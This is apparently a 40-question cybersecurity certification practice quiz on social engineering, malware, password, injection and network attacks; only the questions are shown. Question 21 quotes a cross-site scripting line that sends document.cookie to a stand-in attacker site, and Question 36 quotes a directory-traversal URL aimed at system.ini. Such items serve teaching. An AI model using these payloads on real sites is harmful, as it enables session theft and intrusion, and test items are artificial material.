Question 1 of 40
Match the following social engineering techniques with their corresponding definitions.
Techniques:
- Phishing
- Smishing
- Vishing
- Spear phishing
Definitions:
- An attacker, masquerading as a trusted entity, dupes a victim into opening an email, instant message, or text message
- The user is tricked into downloading a Trojan horse, virus or other malware onto his cellular phone or other mobile devices
- Individuals are tricked into revealing critical financial or personal information to unauthorized entities through voice email or VoIP (voice over IP)
- Is an email or electronic communications scam targeted towards a specific individual, organization or business.
Question 2 of 40
Which of the following social engineering techniques involves utilizing messaging platforms to disseminate unsolicited communications to a significant number of recipients for commercial advertisement or non-commercial advocacy?
Question 3 of 40
Which of the following types of social engineering techniques involves targeting a specific group of individuals by infecting websites that are frequently visited by members of that group?
Question 4 of 40
A company has recently noticed a significant decrease in the performance of its network and servers. Upon investigation, it was discovered that malicious software had infiltrated the network and was using the company’s resources to mine cryptocurrency. Which type of malware is MOST likely responsible for the decrease in network and server performance?
Question 5 of 40
A technique by which both authorized and unauthorized individuals are able to bypass standard security protocols and attain elevated user access, such as root access, on a computer system, network, or software application is known as?
Question 6 of 40
Match the following password attack techniques with their corresponding definitions:
Techniques:
- Brute force attack
- Rainbow table attack
- Dictionary attack
- Plaintext Attack
Definitions:
- An attacker submitting many passwords or passphrases with the hope of eventually guessing correctly
- A type of hacking wherein the perpetrator tries to crack the passwords stored in a database system
- A method of breaking into a password-protected computer or server by systematically entering every word in a dictionary as a password
- An attack model for cryptanalysis where the attacker has access to both the plaintext (called a crib), and its encrypted version (ciphertext).
Question 7 of 40
An organization has recently been the victim of a cyber attack where an attacker was able to compromise a software vendor’s update server and distribute malware through software updates. As the IT security administrator for the organization, you have been tasked with identifying the type of attack that occurred. Which of the following types of attacks BEST describes the scenario described above?
Question 8 of 40
Which of the following cryptographic attacks force victims to use older, more vulnerable versions of software in order to exploit known vulnerabilities against them?
Question 9 of 40
Which of the following attacks is known as URL hijacking?
Question 10 of 40
What type of attack involves an individual utilizing a compromised user account to gain unauthorized access to elevated privileges on a network?
Question 11 of 40
Which of the following injection attacks enables an attacker to disrupt the queries that an application conducts with its database?
Question 12 of 40
Which of the following are considered forms of cross-site request forgery (CSRF) attacks? (Select TWO.)
Question 13 of 40
An individual within the organization initiates a financial transfer request by sending an encrypted message to the financial administrator. An attacker intercepts this message, captures it, and subsequently resends it, appearing as a legitimate request to the financial administrator. As the message is already encrypted and appears authentic, the financial administrator is likely to comply with the request, potentially resulting in a significant financial loss for the organization. Which type of attack is described above?
Question 14 of 40
Which of the following types of attacks involves intercepting communications between an API endpoint and a client with the intent to steal or alter the confidential data being exchanged?
Question 15 of 40
Which type of wireless network attack involves the perpetrator creating a counterfeit access point that appears legitimate, but is used for intercepting wireless communications?
Question 16 of 40
An attacker is utilizing a Layer 2 type of attack to overload the MAC address table of a switch, causing it to enter a fail-open mode and effectively behave like a network hub. This allows the attacker to capture sensitive data from the network by intercepting all frames sent between devices on the network. Given the above scenario, identify the Layer 2 type of attack.
Question 17 of 40
A company has classified its data into three categories: public, confidential, and highly confidential. Which of the following is an appropriate non-technical control that can be implemented for the confidential data category?
Question 18 of 40
An organization has experienced a security incident, and the incident response team needs to coordinate with the human resources department to investigate the incident. What is the primary reason for involving human resources in the incident response process?
Question 19 of 40
A security team is trying to share information about a new type of malware with other organizations in their industry. The team wants to use a standardized format to share the information. Which threat intelligence sharing format should the team use?
Question 20 of 40
An organization is reviewing its data types and is trying to determine which type of data should be classified as Restricted. Which of the following data types should be classified as Restricted?
Question 21 of 40
As a security analyst, you have been assigned to conduct a source code analysis of multiple websites. While reviewing the source code, you come across the following code snippet:
"http://www.client-website.com/search ? location.href=' http://www.villainsite.com/hijacker.php?cookie= '+document.cookie; "
Given this scenario, what type of attack is the attacker attempting to execute against the client’s website?
Question 22 of 40
An employee at a small business receives an email from a supposed client that includes a link to download a software update. The employee clicks on the link and unknowingly installs a malicious program on the company’s computer network. Which type of malware is most likely responsible for the compromise of the network?
Question 23 of 40
You are working as a security administrator for a large organization. Recently, you have noticed that some of the employees are able to access systems and data that they are not authorized to access. You suspect that the issue is related to privilege escalation. Which of the following is the MOST likely cause of the privilege escalation issue in this scenario?
Question 24 of 40
In which of the following types of Domain Name System (DNS) attacks does an attacker introduce corrupt DNS data into a DNS resolver’s cache with the intent to redirect users to incorrect or malicious websites?
Question 25 of 40
Which of the following attacks is a Network Layer DDoS attack?
Question 26 of 40
The individual or group who accesses and manipulates computer systems without authorization for personal or malicious purposes, such as data theft or system vandalism, is commonly referred to as:
Question 27 of 40
Which of the following resources can help you identify web application vulnerabilities and ensure the security of your web application?
Question 28 of 40
Which of the following terms refers to the unauthorized use or implementation of Information Technology (IT) applications and infrastructure within an enterprise without the knowledge or approval of the IT department?
Question 29 of 40
A malicious actor was able to gain access to a company’s confidential data by exploiting a flaw in the company’s software. The company was not aware of the flaw and had not yet released a patch for it. Which of the following types of attacks best describes this incident?
Question 30 of 40
What is the term used to describe the situation in which an Intrusion Detection System (IDS) identifies an activity as an attack, but the activity is actually considered acceptable behavior within the network?
Question 31 of 40
During a penetration testing engagement, an individual is gathering information about the target organization’s network and infrastructure to identify potential vulnerabilities. Which phase of the penetration testing process is this individual in?
Question 32 of 40
Which of the following cybersecurity testing exercise teams is known for its ability to perform both offensive and defensive tactics?
Question 33 of 40
Which of the following terms describes the tactic of directing individuals from a legitimate webpage to a fraudulent URL, typically used to impersonate a reputable site and collect sensitive information from unsuspecting victims?
Question 34 of 40
Which of the following terms refers to individuals who possess specialized knowledge and skills in the field of computer security, and use them for lawful and ethical purposes, rather than for malicious or illegal activities?
Question 35 of 40
In a large data center, a security administrator wants to reduce the risk of unauthorized access to sensitive data by implementing physical segmentation. Which of the following would be the most effective solution?
Question 36 of 40
As a security analyst, you have been assigned to conduct a vulnerability assessment of the company’s web assets utilizing the Acunetix Web Vulnerability Scanner tool. Upon reviewing the scan report, you have discovered a potential security issue related to the following URL:
http://test.webarticles.com/show.asp?view=../../../../../Windows/system.ini HTTP/1.1
Based on this information, what kind of vulnerability or attack is being indicated by this URL?
Question 37 of 40
A security analyst is tasked with analyzing endpoint user behavior to identify any suspicious activity. Which of the following UEBA techniques would be MOST useful in this scenario?
Question 38 of 40
What is the purpose of establishing ownership of data in an organization?
Question 39 of 40
An organization has recently been the victim of a successful cyber attack. The attackers were able to exploit a known vulnerability in the organization’s network infrastructure. The organization wants to know more about the vulnerability and how it can be mitigated. Which of the following resources would be most useful in identifying the vulnerability and potential solutions?
Question 40 of 40
A security analyst is conducting a security assessment of a company’s website and is attempting to identify any potential vulnerabilities that could be exploited. Which of the following steps would the analyst likely take to gather information about the website?